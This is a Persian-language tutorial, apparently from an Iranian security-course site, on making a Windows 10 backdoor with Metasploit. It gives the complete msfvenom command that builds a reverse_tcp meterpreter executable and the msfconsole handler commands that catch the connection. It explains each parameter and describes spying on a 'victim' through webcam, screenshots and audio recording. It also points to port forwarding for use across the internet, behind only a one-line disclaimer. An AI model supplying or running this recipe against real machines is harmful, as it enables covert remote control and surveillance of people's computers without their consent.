: :
مانده تا پایان تخفیف
فقط تا آخر امروز
فقط امروز

آموزش ساخت Backdoor (درب پشتی) برای ویندوز 10

در این آموزش شما با نحوه ساخت بکدور یا همون در پشتی در متااسپلویت برای ویندوز 10 آشنا خواهید شد .*(این آموزش جهت بالابردن سطح دانش شما میباشد و هر گونه سوء استفاده بر عهده خودتان هست) اول در ترمینال لینوکس کد زیر را مینویسیم :

دوره های شبکه، برنامه نویسی، مجازی سازی، امنیت، نفوذ و ... با برترین های ایران
سرفصل های این مطلب
  1. تعریف اصطلاحات
  2. توضیح اصطلاحات
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST = 192.168.1.1 LPORT=4444 -o /root/Desktop/Backdoor.exe

تعریف اصطلاحات

  • msfvenom : این دستور جایگزینی برای دستورات msfpayload و msfencode بود از سال 2015 با ساخت کالی ورژن 2.0 جایگزین این دو دستور شد و کارش هم ساخت پیلود و اینکودر برای بکدور هستش .
  • p- : این پارامتر برای ساخت پیلود تحت یک پلت فرم مورد استفاده قرار میگیره مثلا : ویندوز یا لینوکس خودش یا اندروید و ...
  • Windows : پیلود برای این پلت فرم ساخته بشه .
  • meterpreter/reverse__tcp : این دستور برای اینه که بعد از اجرای بکدور توسط قربانی به شما دسترسی ریموت شل میده و میتونید با پارامتر های زیادی کار کنید . از جمله : دیدن وبکم و صفحه دسکتاپ قربانی و اسکرین شات از صفحه و ضبط صدا و ...
  • platform-- windows : فقط برای ویندوز باشه بکدور اجرایی که میسازیم .
  • a- : این پارامتر میاد encoder مورد نظر رو دریافت میکنه مثلا : x64 Or x86
  • f- : این پارامتر میاد برای ما فرمت فایل خروجی رو تعیین میکنه : مثلا اجرایی باشه یا ...
  • LHOST : با این دستور میایم یه آیپی ست میکنیم که اطلاعات ارسالی از قربانی به این آی پی ارسال بشه .
  • LPORT : با این دستور میایم یه پورت ست میکنیم که اطلات ارسالی از قربانی با اسفتاده از این پورت دریافت بشه .
  • o- : این پارامتر برای ایجاد خروجی هستش که بعدش با پارامتر f- میایم اون خروجی رو بهش فرمت میدیم .
  • root/Desktop/Backdoor.exe : این محل دخیره فایل بکدور ما هستش که گفتیم تو مسیر روت // دسکتاپ // و با اسم بکدور ذخیره بشه .

خب بعد از ساخت ما باید یه لیسینر یا گوش دهنده بسازیم که بیاد برای ما به آی پی و پورتی که به بکدور دادیم گوش بده و اطلاعات رو برای ما دریافت کنه :

با تایپ دستور msfconsole در محیط ترمینال وارد متااسپلویت میشیم :

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit

توضیح اصطلاحات

  • use exploit/multi/handler : این دستور میاد یه هندلر ایجاد میکنه .
  • set payload windows/meterpreter/reverse_tcp : این دستور میاد به گوش هندلر میفهمونه که ما با استفاده از این پیلود میخایم ارتباط برقرار کنیم .
  • set LHOST : این دستور میاد آی پی که قبلا داخل ساخت بکدور استفاده کرده بودیم رو ازمون میگیره تا به همون آی پی گوش بده .
  • set LPORT : این دستور هم میاد پورتی که قبلا داخل ساخت بکدور استفاده کرده بودیم رو ازمون میگیره تا با استفاده از همون پورت اطلاعات رو بفرسته برامون .
  • exploit : این دستور هم در آخر سر میاد گوش دهنده رو در حالت اجرا میزاره تا وقتی که بکدور توسط قربانی اجرا بشه .

نکته : این آموزش فقط برای شبکه داخلی یا همون Lan هستش اگر میخاهید برای Wan یا همون شبکه جهانی باشه باید عملیات پورت فورواردینگ رو انجام بدید . که داخل سایت آموزش پورت فورواردینگ هستش و نیاز به آموزش نیست .


ادریس شریفی
ادریس شریفی

مسلط به تکنولوژی ها HTML5,CSS3 , زبان های PHP,C-Sharp-java-vb.net و متخصص هک و نفوذ به کلاینت ها

نظرات